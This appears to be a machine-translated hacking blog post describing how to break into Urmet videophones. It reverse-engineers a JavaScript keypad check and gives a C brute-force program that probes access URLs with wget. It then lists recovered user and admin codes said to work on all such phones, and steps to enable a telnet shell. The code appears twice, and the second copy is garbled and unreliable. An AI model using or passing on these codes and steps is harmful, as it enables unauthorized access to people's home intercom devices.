Hacking of videophones (2)

Pointing your browser at http://192.168.1.2:8080/ takes you to a login page, and you will see that it is very bare; probably the web interface was made for debugging and is used only by insiders (and by us!)

A page appears with a numeric keypad on which we must enter a code to gain access.

At first sight it does not give the impression of maximum security.

How it works

Looking at the source we see that every time a button is pressed a JavaScript function, Enter_code(), is invoked with the digit.

 24 var code = 0 var mul = 1 var digit = 0 var fails = 0 function Enter_code ( number ) { code = code * 10 + number mul = mul * number document. codepad . thecode . value = code digit ++ if ( digit == 8 ) { if ( mul == 40320 ) { location = code + ".html" } if ( mul == 11907 ) { location = "Admin" + code + ".html" } else { fails ++ code = 0 mul = 1 digit = 0 if ( fails < 3 ) { if ( fails == 1 ) { document. codepad . thecode . value = "Try again" } if ( fails == 2 ) { document. codepad . thecode . value = "Last Time" } } else { location = "http://www.urmet.it" document. codepad . thecode . value = "Bye!" } } } } usermulcode var = 24 var code = 0 mul = 1 var var var digit = 0 fails = 0 Enter_code function (number) (code = code * 10 + number mul = mul * number document. codepad. thecode. value = code digit + + if (digit == 8) (if (mul == 40320) (+ location = code. "html") if (mul == 11907) (location = "Admin" + + code. "html") else (fails + + code = 0 mul = 1 digit = 0 if (fails <3) (if (fails == 1) (document. codepad. thecode. Value = "Try again") if (fails == 2) (document. codepad. thecode. value = "Last Time")) else (location = "http://www.urmet.it" document. codepad. thecode. value = "Bye!")))) 

Looking at the code gives us an idea of how it works. After 3 attempts we are redirected to Urmet's website. The code to enter is 8 digits long, and we can gain access with two codes: one gives administrator access and the other normal user access. The URL opened by entering the correct code is formed from the code itself, so if you do not know the code you do not know what the URL is. Applying a mathematical function to the code's digits must give 40,320 for user access and 11,907 for administrator access.

How to enter

Another thing we can tell from the JavaScript is that the check on the code considers the digits dialed on the keypad but not the order in which they are typed, so there are several codes that pass the check but only one is the right one; for all the others the server responds with a 404 error (page not found).

 user_access , admin_access , n_digits ; char ip [ 256 ] , * sCode ; int finded_user = 0 , finded_admin = 0 ; long calcola_mul ( int * digits ) { int i , code = 0 ; long mul = 1 ; for ( i = 0 ; i < n_digits ; i ++ ) { code = code * 10 + digits [ i ] ; mul = mul * digits [ i ] ; } return mul ; } void stampav ( int * digits ) { int i ; for ( i = 0 ; i < n_digits ; i ++ ) printf ( "%d " , digits [ i ] ) ; printf ( "n" ) ; } char * stampaCode ( int * digits ) { int i ; for ( i = 0 ; i < n_digits ; i ++ ) sCode [ i ] = digits [ i ] + '0' ; return sCode ; } void backtrack ( int * v , int i ) { long mul ; int c ; char cmd [ 256 ] ; if ( i >= n_digits ) { /* fine della ricorsione */ mul = calcola_mul ( v ) ; if ( finded_user == 0 && mul == user_access ) { sprintf ( cmd , "wget -q -O - http://%s/%s.html > /dev/null" , ip , stampaCode ( v ) ) ; if ( system ( cmd ) == 0 ) { printf ( "User access code: " ) ; stampav ( v ) ; finded_user = 1 ; } return ; } if ( finded_admin == 0 && mul == admin_access ) { sprintf ( cmd , "wget -q -O - http://%s/Admin%s.html > /dev/null" , ip , stampaCode ( v ) ) ; if ( system ( cmd ) == 0 ) { printf ( "Admin access code: " ) ; stampav ( v ) ; finded_admin = 1 ; } return ; } return ; } for ( c = 1 ; c <= 9 ; c ++ ) { if ( finded_admin && finded_user ) return ; v [ i ] = c ; backtrack ( v , i + 1 ) ; } } int main ( int argc , char * argv [ ] ) { int * digits ; if ( argc != 4 && argc != 5 ) { printf ( "Usage: %s <ip[:port]> <number_digits> <user_code> [<admin_code>]n" , argv [ 0 ] ) ; return 1 ; } strcpy ( ip , argv [ 1 ] ) ; n_digits = atoi ( argv [ 2 ] ) ; user_access = atoi ( argv [ 3 ] ) ; if ( argc == 5 ) admin_access = atoi ( argv [ 4 ] ) ; else finded_admin = 1 ; digits = ( int * ) malloc ( n_digits * sizeof ( int ) ) ; sCode = ( char * ) malloc ( n_digits * sizeof ( char ) ) ; backtrack ( digits , 0 ) ; free ( digits ) ; free ( sCode ) ; return 0 ; } <stdio.h> # Include # include # include <stdlib.h> <string.h> int user_access, 
admin_access, n_digits; char ip [256] * sCode; finded_user int = 0, finded_admin = 0; long calcola_mul (int * digits) (int i, code = 0; long mul = 1; for (i = 0; i <n_digits; i + +) (queues = queues * 10 + digits [i]; mul = mul * digits [i] ;) return mul;) void Stampavie (int * digits) (int i; for (i = 0; i <n_digits; i + +) printf ("% d", digits [i]) printf ("n") ;) stampaCode char * (int * digits) (int i; for (i = 0; i <n_digits; i + +) sCode [i] = digits [i] + '0 '; sCode return;) void backtrack (int * v, int i) (long mul, int c, char cmd [256] if (i> = n_digits) (/ * end of recursion * / mul = calcola_mul (v) if (finded_user == 0 & & multi = = user_access) (sprintf (cmd, "wget-q-O - http://% s /% s.html> / dev / null", ip, stampaCode (v)) if (system (cmd) == 0 ) (printf ("User Access Code"); Stampavie (v); finded_user = 1;) return;) if (finded_admin == 0 & & == admin_access mul) (sprintf (cmd, "wget-q-O - http : / /% s /% s.html Admin> / dev / NULL, ip, stampaCode (v)) if (system (cmd) == 0) printf (("Admin Access Code:"); Stampavie (v ) finded_admin = 1;) return;) return;) for (c = 1 c <= 9, c + +) (if (finded_admin & & finded_user) return; v [i] = c; backtrack (v, i + 1);)) int main (int argc, char * argv []) (int * digits if (argc! = 4 & & argc! = 5) (printf ("Usage:% s <ip[:port]> < number_digits> <user_code> [<admin_code>] n ", argv [0]) return 1;) strcpy (ip, argv [1]); n_digits = atoi (argv [2]); user_access = atoi (argv [3 ]) if (argc == 5) admin_access = atoi (argv [4]); else finded_admin = 1, digits = (int *) malloc (n_digits * sizeof (int)); sCode = (char *) malloc (n_digits * sizeof (char)); backtrack (digits, 0); free (digits); free (sCode) return 0;) 

Once compiled, the program can be run and prints the codes to access the videophone.
$ ./access 192.168.1.2:8080 8 40320 11907
User access code: 1 2 3 4 5 6 7 8
Admin access code: 1 9 7 1 1 3 9 7

The phones should all be the same, so these codes should allow access to all of them. I also tried another phone with a different software version; in that case the digits were 10 instead of 8 and there was only the administrator user, and the code was 1 9 7 1 1 3 9 7 2 7.

We are inside

Now we can change the configuration of the phone at will.
From the web interface click on "System Information" and then on "Optional Net Services"; the phone will then start a telnet server to which we can simply connect with the command
telnet 192.168.1.2 23 resulting in a beautiful shell.

Have fun.
